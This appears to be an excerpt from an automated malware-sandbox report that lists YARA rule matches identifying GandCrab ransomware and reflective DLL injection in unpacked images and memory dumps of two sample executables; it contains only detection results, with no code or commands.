Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
